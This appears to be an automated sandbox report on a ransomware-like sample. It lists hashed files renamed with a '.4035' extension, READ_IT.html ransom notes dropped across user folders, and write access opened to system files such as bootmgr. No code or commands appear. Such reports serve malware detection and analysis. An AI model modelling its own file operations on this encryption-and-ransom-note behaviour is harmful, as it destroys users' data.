c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\1og0qp3fd-msljbk.mp4.4035	74.56 KB (76346 bytes)	MD5: fe304b21152c6183d960d4d4f2fadfa7 SHA1: 004e8bdb368b50194d9c25fecfbe020d9d86be39 SHA256: ee5adcf4e79cc073d6c4e700a86b3649e04b391cd8ea1b37aed6f97168678968	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\desktop.ini.4035	1.42 KB (1456 bytes)	MD5: ca471b303bbcbe0ad8f75bb9ea51caa7 SHA1: 17b0a0387f65b70c9f112dc86c3c12be69f6b374 SHA256: f6d36c9c57adc572ba16be91e2eb372438b0f00f4087586339f7ab6e7732c078	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\kyzg9qjv.mp4.4035	11.60 KB (11882 bytes)	MD5: 54d39d6df8bd6e4dad3ef0a200b1fc01 SHA1: 7ffce778d8903b262ccda9b006b42a5b09e7be5c SHA256: 4a8f4b88fdcd37b28464fcd3aa152ae7212fd3193012555a77e029d355f69ebe	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\mrbfxb6wzfjqjhj.avi.4035	87.86 KB (89968 bytes)	MD5: 1f9cd2933ccd0ad365d4f4f5f5612b66 SHA1: 87adf3bc6ba1ab4bb5128a55173e7d1b3be5c6b8 SHA256: c46e934742e11e288141a5aaf6034d98ac70da5e945b6e911951707fe6fc5123	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\oau1-cqboi.flv.4035	12.53 KB (12834 bytes)	MD5: fd493a66de029ffcc0d444f5fe718552 SHA1: 50e18c7f0382d79f9ead32dccacdc17f75732b50 SHA256: a3ec86bd020563f08ee4b3e7d0d2b280417f10d85a285521b96a45034c60f9dd	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\rqt04-sfczoy.swf.4035	3.34 KB (3424 bytes)	MD5: c694568c984ebf5cce602a04c2efda21 SHA1: 62cee0a5918316782b21e0a89e01acc1117de038 SHA256: 9b59a1694754df96e99379fdc9e6dc73f70b85852f25f6de038dbb38fe686331	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\zpls8lo4rhe9i.flv.4035	72.41 KB (74144 bytes)	MD5: dad6d1cb627c5dc66f8beff124601e0e SHA1: c2a1862900dd2fefb0dcb6f2b265d7acca289e35 SHA256: dd4dc5a5d3c0ec1f604c33192bafd94fe9882fe379827bf8ae88e23ee044eb29	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\zsxmbwqk2e.avi.4035	69.12 KB (70784 bytes)	MD5: d0cec1d4c1992fe96781e4402b1d46e0 SHA1: 95cc6459fcb6c1ad165f6887984c7adabe08f8f2 SHA256: 5415b7a8aaa81629283109b62759ca0500df5f88ac150d75135de779ea3a56f3	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\6nqrr.flv.4035	67.38 KB (68992 bytes)	MD5: 492d060d626d9dc07fbcb27982e6ef3a SHA1: 12118ef85937c348c4022afe182026fb126b0da1 SHA256: ace5ac98b22860209f1aa0c26fc48d0205533f625790c89186538761a374875e	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\cacxexcsoudw1ihbrvjj.flv.4035	72.38 KB (74112 bytes)	MD5: 5d6e37aebb92ce0df15c8a46eead4cd4 SHA1: ac586da11c9249e24dcd99c4f15464695dec4c8d SHA256: 6dcfd324d7d5a21ddac1250dd8178b4f3c7bb10e20b0ff31a2f702ed377fd68a	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\cpe6b9cb6wzufywlybxe.avi.4035	26.65 KB (27288 bytes)	MD5: 33ae70ed9c02375810fc6fc8e8b135e0 SHA1: ca28891089e1a5b7c34500b8e594e28d5740ae2e SHA256: 7d02c09f0f1790b1d2f9ded6c71782b7fc3fe774705ecca45d305a38e3811c82	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\kn8m4xkhxs.mp4.4035	42.91 KB (43944 bytes)	MD5: d16da673151ea6951850e3808dd7144f SHA1: a21dd60d35f9009c4fc05931662b8b25022be7d9 SHA256: 1a80b46ef495666e719a5006388e447a52017b15794176d1b398f8947499421e	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\nac 5jyw.mp4.4035	70.67 KB (72368 bytes)	MD5: 013ceea4037ddfefe93741258ac33658 SHA1: f8a6d0724f2efe4e93604249294fc93628f33e4c SHA256: cbe47e10eb172c1a5a03b9e1b4351c85e5ff736495ad42af53af83d3c8c0730d	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\t4ped9h1nce.avi.4035	12.57 KB (12875 bytes)	MD5: a92352091958533a7039305745544a10 SHA1: 32ff4ba11cbb90f56d35ac726674d121c8fa46ce SHA256: fa5bac0cb713347c8011f6c80672d8a606b0f51643daf425fc498c8809124e4f	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\z5ebmfgj8h8.avi.4035	61.72 KB (63201 bytes)	MD5: c0dbd7f6edf6c4e149d440d87521268f SHA1: eda688df10bc5a6300efeb01c69d1879ecdc63fe SHA256: 19e3e71c9fbf6f95cbfe3b7f6a64f9c80414b3d211b87182d3a43b7ebacacd26	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\f zdvb2r.avi.4035	97.89 KB (100240 bytes)	MD5: b267271a13f0b14a5502c08d06ce76ad SHA1: 14e003faacd2e2541db9b07841248893a65580aa SHA256: fa8d6a555688a9942035789aba025c9adfa1b479e6398b61eb0f915644589fbf	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\fnm9ey1oqb.swf.4035	79.21 KB (81114 bytes)	MD5: 668d201f49f3175e7cff2f688233071d SHA1: ec1e80620dc9519f67c94c40d2255c13272f201a SHA256: 10065789372b36ee5df684dcdd134b3187e2f3333b4d26743271382049b8fcba	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\fv9tkzgsub.mp4.4035	81.66 KB (83616 bytes)	MD5: f6201cea6fef7e3108d663373a800a83 SHA1: b921f60ea7d5d5b2843019c22ceddbc925751cc6 SHA256: 2272f5c2a80846c401a8d5d79aa2dff3f4fd6ed056c0b7cb7cd87a186efb5e04	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\ockbgbvfktod_qgfrkqn.swf.4035	17.45 KB (17872 bytes)	MD5: 6545ea5d0b7befda6d34fa57dce3dd9d SHA1: 98d4ec976a6175a79ecb49798401a9a481c10edc SHA256: d03b4ccaee9b7f9b7e80d5f0e3aad03b28f9ac9ab5f9968a5d1b7ab3f44c85ce	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\oisajrkn_h.mkv.4035	2.83 KB (2896 bytes)	MD5: f8309ba83b0065a1b859c7b642fd9131 SHA1: 9453edd5b686a33b834d503baa6f0e9f6e973c8a SHA256: dbeda6849235fef5bd8e93626dcc68b3a47db7accf65b8e9ab9ce52dfcaea94f	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\tetxjj37r28jw0n.mp4.4035	23.94 KB (24512 bytes)	MD5: b5d2b2904421f460f0ee82e851a1c73b SHA1: 8052cd1b8cd81f3af82c39afe61f4033cec83930 SHA256: b1d597435da49e4db2d6deddc06f36f109eede08ddf5c8b62a916253aca12a4c	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\xhlr3jry9wkpax.mp4.4035	37.48 KB (38384 bytes)	MD5: 58369a36db14e6595a789851b283d61d SHA1: 821665b9a25aa3c91c7e00b7cb0bf40f961dbd4c SHA256: 31daeaf2a8429e7790d3b2028937cec58f90bf48dc38895eb97c1652e8935360	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\ybwcw_epzk5by0z.mkv.4035	54.42 KB (55728 bytes)	MD5: b66d48e45ccae67e28d346f780e87270 SHA1: 9c33c23391c521cadbbaf3f48318bd8be19b9d17 SHA256: b264303c73b0013757fabc7876459909651655deea5e77caf92ccf121be0be60	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\zmkog8xlo9rcs.mkv.4035	20.20 KB (20688 bytes)	MD5: 4c550a4ad0eed37b442cffd2d373762a SHA1: 6b4cea08a912e6790a1bf97ebc31c5a556fc9c5a SHA256: 78d05e7485ed6429798f62fa257434d12232e3d4bf2e398a0ef60c4d85165d77	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\urnkmksgaz1mrc-kzew\2i7jnwg0lwz13o.flv.4035	21.98 KB (22512 bytes)	MD5: 78bf02a3925027ace179e23ccb256869 SHA1: a602ebd54a826dfa56af05987dc72f68776f9521 SHA256: 0246bd496eec13d9e735a0630b05e188b39f901ab5163d439e0fab04aa969c00	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\urnkmksgaz1mrc-kzew\55qynpcjbwzw8f.swf.4035	27.61 KB (28272 bytes)	MD5: 10708f3fb882e3d5f2b9417728f55c10 SHA1: c5b77bbaf011174e11489bcfbd03d58484eaf10d SHA256: f703a89cc68563b310e3be883e34016ffdb1d842363b2cf10796175437f2bc7a	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\urnkmksgaz1mrc-kzew\mrd3l.mp4.4035	99.27 KB (101648 bytes)	MD5: ca915502ceff9cde07b51cb12ed7107f SHA1: a2d1a927685967566b64629315f52a1cd4cb9821 SHA256: 1b91b76556c9bce0ed9dd528ba9bebc06465c9f8ba980708ec23a2ab30c4ae12	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\urnkmksgaz1mrc-kzew\zgirtybopanwcif8o1.swf.4035	65.27 KB (66832 bytes)	MD5: cc402bf50867ad79be1ae0c7960928f8 SHA1: df49e469711f447f0564ab9b1cce6df46b67876d SHA256: c2a9e5ac5a555346e999bb9d0b416877af5092c74fd07a5f1890d44786d72e7d	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\searches\desktop.ini.4035	1.44 KB (1472 bytes)	MD5: 279891bd6c623ef3ffa2e21ddf63237b SHA1: 12d2f682467fed2c730f690c8e71f1fa6c9c16d3 SHA256: e1f69d779be647ec59560178cc9c8117ec15874b87898365129eaa7a758e0672	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\searches\everywhere.search-ms.4035	1.17 KB (1200 bytes)	MD5: 0ca019a9e1bd7e47a87cc6b550e74794 SHA1: 44e35c6765d5b032ec350b0fd76db606b3ada11b SHA256: 5caa05d36fdce39064c466dcd1d1e752afa5c81c18cd7567ba20e8282088c3c4	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\searches\indexed locations.search-ms.4035	1.17 KB (1200 bytes)	MD5: 9af2058747ac183509e2234c230fb7ea SHA1: 8be6133aae04cb697aa897b2bc29b129e1dff3a8 SHA256: 7fbc4231ab10e7f7050da43035cdee104a4d1152df2bad05250f03ac71ca24c1	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\saved games\desktop.ini.4035	1.20 KB (1232 bytes)	MD5: 8ddb4bceb0d12f39dddf4247f8dc193a SHA1: 0418b977bf07ec646c4d37080d7d652b221e8ae0 SHA256: ce68f1294c3d128cf4a4c9eed21fc60673572b909ede222cae8bca8d28193932	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\2b4wmbwvq9snluu4mk.bmp.4035	25.27 KB (25872 bytes)	MD5: 16ef20050d6118d05d4276b949a9da27 SHA1: a54937aa85686b6e656afd83c46952aca1e57928 SHA256: 0f0d2249f84ab0ed7073be3c097cb48c5bc8a95f4a839ad1c7d3e6a92d3c9e49	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\3jtcbgjtkksxrdhl2vx.bmp.4035	42.03 KB (43040 bytes)	MD5: e4327e932fcd51b00be6b63f1f26dd07 SHA1: ed0c2be13590039a762b112a9a8d1ed90591032b SHA256: 5b0042c8fc3ad3a173ef46f55c4771d3bed87d9b09bd3146bb0112e069157a76	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\4tyovjchur84aw.gif.4035	74.72 KB (76518 bytes)	MD5: d6d61bb1c14fe4d7ebfd1cc156376e1e SHA1: 6ea225e98a03a477fdf27b0a284125313fbd66ca SHA256: 864cf2df1ba5984ed77ea6aaf21bdf81da3d45200e6387ede02058cc5917f67d	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\6bloetbft_jtjmwtwvvk.gif.4035	66.61 KB (68208 bytes)	MD5: e2695b4e6c53876161fbd5711187ac9c SHA1: 3c8aa32a13a37993d55d8fe5b8c65e23933134a6 SHA256: be07b45b701687c60d85266d0f3a8c35c00d5d1d0a569b96cc2f8736d1766dea	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\6qfpygn63k3cnso.gif.4035	35.36 KB (36208 bytes)	MD5: dc6c0d2bf7447847b1292f5ea5d19266 SHA1: c9d84ea937d475ca0cf56d99873fcc8f90525c4c SHA256: 199f42cb2e2c868e3be063ef6e9d06651e50713c9ca894e5157ce65a8bdd7898	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\70yieg1gzzxq5b23s.png.4035	36.91 KB (37792 bytes)	MD5: 837c0ce4cfa32ce41c538836a136f29e SHA1: bd177a3c4abccc0b7fdbd2e22dbf31b9a8ae171c SHA256: 1abcc8e53a2e01419d0b9d6cc7cdc09033f39daf8ce105be4b3d1d403efc7acb	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\7er4.gif.4035	98.05 KB (100400 bytes)	MD5: 4794438ee0b8191d7677aba8026bcbaa SHA1: dd93c574932a84bd0a1d8900bb6fe7c9ddd5b267 SHA256: 8ac6d66c9664ec6c5b5f3e3d9127f1427fbac7b2400c89e14868d5ccd6c63377	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\a3l wgby9v41odw.bmp.4035	30.52 KB (31248 bytes)	MD5: 7c0687ae9c177157f36a58f0f179ec33 SHA1: baca70a91ca496f795668d8c4c92ef7b64f4ab33 SHA256: fc1c35ced2205a0c07d6097236cc1a1fb721f9e9552837929b78abb1a0702158	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\bazjhbm7.jpg.4035	77.78 KB (79647 bytes)	MD5: 1adc5c394adb07ac7f2a6edc35655b01 SHA1: aa21580bd2c759b0d7e20b361c99c0dc4a165280 SHA256: 97c428b1b036457703936b271228699bd116e399d1a5b01db603665a282f1b1a	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\desktop.ini.4035	1.42 KB (1456 bytes)	MD5: fae4aca400a240e9ee4af690f4864c7d SHA1: eaa6dad5e0736f81c8e6a3baedd93d9ff4b04ec4 SHA256: c7a17a3103762701f5290d59e40d6f195a594e97b800de51c8546a8117ceb721	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\l5w5ag34.png.4035	38.12 KB (39040 bytes)	MD5: 10a232191183067a720c8fb8924d21c6 SHA1: 8b2844a640ccf135abbe71ef70e98881729476c6 SHA256: 5120b66ae778d5c7196e33e0f26c39c912c5ebace2055a942f987d1c12315801	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\ntuser.ini.4035	0.95 KB (976 bytes)	MD5: 9918d934d1d114724c06920b676a815d SHA1: 8659d3027ac844883ae03898b712215556684986 SHA256: 89eceb1c978b7a681b80ed3b90118427096a598e4fe596d3fb575fbb58d31835	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\iconcache.db.4035	1.11 MB (1166432 bytes)	MD5: 10bbe90333794c619387b038e1025124 SHA1: daadc81e5bff5203214b828977e2977ec755aef3 SHA256: b5e724b03ca68fbdf1f18394f1237dd8acf8c340ebf1c707fedea2727c927b48	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\adobearm.log.4035	1.62 KB (1664 bytes)	MD5: 7dd2a9ec73191e19652ef70335b4c59f SHA1: 1878eb93b6b4e7ba4de0a9557ae3ef070281a1ac SHA256: 8ac7b9d4e5ed532447d3187630ed7b32265e1ba5930611d40b7ce66c9af17a19	File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
c:\users\ybz8btyyvts 7lfsqb0g\ntuser.ini	0.95 KB (976 bytes)	MD5: a69d1ce732f370c4e3dbdc4b92a09694 SHA1: ebe2275af3897092841d1199e5ac4f742563166c SHA256: 7258116174418acc346e6423bef9ab0de57c0ab329d22b7b867e07cfd9ab1e12	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\1og0qp3fd-msljbk.mp4	74.56 KB (76346 bytes)	MD5: fe304b21152c6183d960d4d4f2fadfa7 SHA1: 004e8bdb368b50194d9c25fecfbe020d9d86be39 SHA256: ee5adcf4e79cc073d6c4e700a86b3649e04b391cd8ea1b37aed6f97168678968	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\desktop.ini	1.42 KB (1456 bytes)	MD5: ca471b303bbcbe0ad8f75bb9ea51caa7 SHA1: 17b0a0387f65b70c9f112dc86c3c12be69f6b374 SHA256: f6d36c9c57adc572ba16be91e2eb372438b0f00f4087586339f7ab6e7732c078	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\kyzg9qjv.mp4	11.60 KB (11882 bytes)	MD5: 54d39d6df8bd6e4dad3ef0a200b1fc01 SHA1: 7ffce778d8903b262ccda9b006b42a5b09e7be5c SHA256: 4a8f4b88fdcd37b28464fcd3aa152ae7212fd3193012555a77e029d355f69ebe	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\mrbfxb6wzfjqjhj.avi	87.86 KB (89968 bytes)	MD5: 1f9cd2933ccd0ad365d4f4f5f5612b66 SHA1: 87adf3bc6ba1ab4bb5128a55173e7d1b3be5c6b8 SHA256: c46e934742e11e288141a5aaf6034d98ac70da5e945b6e911951707fe6fc5123	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\oau1-cqboi.flv	12.53 KB (12834 bytes)	MD5: fd493a66de029ffcc0d444f5fe718552 SHA1: 50e18c7f0382d79f9ead32dccacdc17f75732b50 SHA256: a3ec86bd020563f08ee4b3e7d0d2b280417f10d85a285521b96a45034c60f9dd	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\rqt04-sfczoy.swf	3.34 KB (3424 bytes)	MD5: c694568c984ebf5cce602a04c2efda21 SHA1: 62cee0a5918316782b21e0a89e01acc1117de038 SHA256: 9b59a1694754df96e99379fdc9e6dc73f70b85852f25f6de038dbb38fe686331	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\zpls8lo4rhe9i.flv	72.41 KB (74144 bytes)	MD5: dad6d1cb627c5dc66f8beff124601e0e SHA1: c2a1862900dd2fefb0dcb6f2b265d7acca289e35 SHA256: dd4dc5a5d3c0ec1f604c33192bafd94fe9882fe379827bf8ae88e23ee044eb29	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\ntuser.ini	0.95 KB (976 bytes)	MD5: 9918d934d1d114724c06920b676a815d SHA1: 8659d3027ac844883ae03898b712215556684986 SHA256: 89eceb1c978b7a681b80ed3b90118427096a598e4fe596d3fb575fbb58d31835	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\documents\my shapes\favorites.vss	1.80 KB (1840 bytes)	MD5: 07e593200b1b6d5fb49923941f54ae70 SHA1: 9d3863811bff04541156538a817e44a9c96d5808 SHA256: 92704ace6eb1bcd48171014583d1773925b81177b28edb996f9d723fc0839602	File Actions Show Properties Download

Host Behavior

File (2619)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\Public\{846ee340-7039-11de-9d20-806e6f6e6963}	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\bootmgr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\BOOTSECT.BAK	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\hiberfil.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\pagefile.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.dat.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.dat.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\1og0qP3Fd-msLjBK.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\KyzG9Qjv.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\mRBfXb6WZFJqjhJ.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\oaU1-cqbOI.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\RQT04-SfCzOy.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\ZplS8lO4RHe9I.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\ZsxMbWqK2e.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\6NqrR.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\CaCxexCSoudw1ihbRVJj.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\cpe6B9Cb6wzufywLybXe.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\Kn8m4xKHxS.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\nAC 5Jyw.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\T4peD9H1NCe.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\Z5EbMfgJ8h8.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\f ZdvB2R.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\FnM9eY1OQb.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\FV9TKZgsub.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\oCKBGbVfktOD_QgfRkQn.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\oIsaJRkn_H.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\teTxJJ37R28jW0n.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\xhLR3jry9wKPAx.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
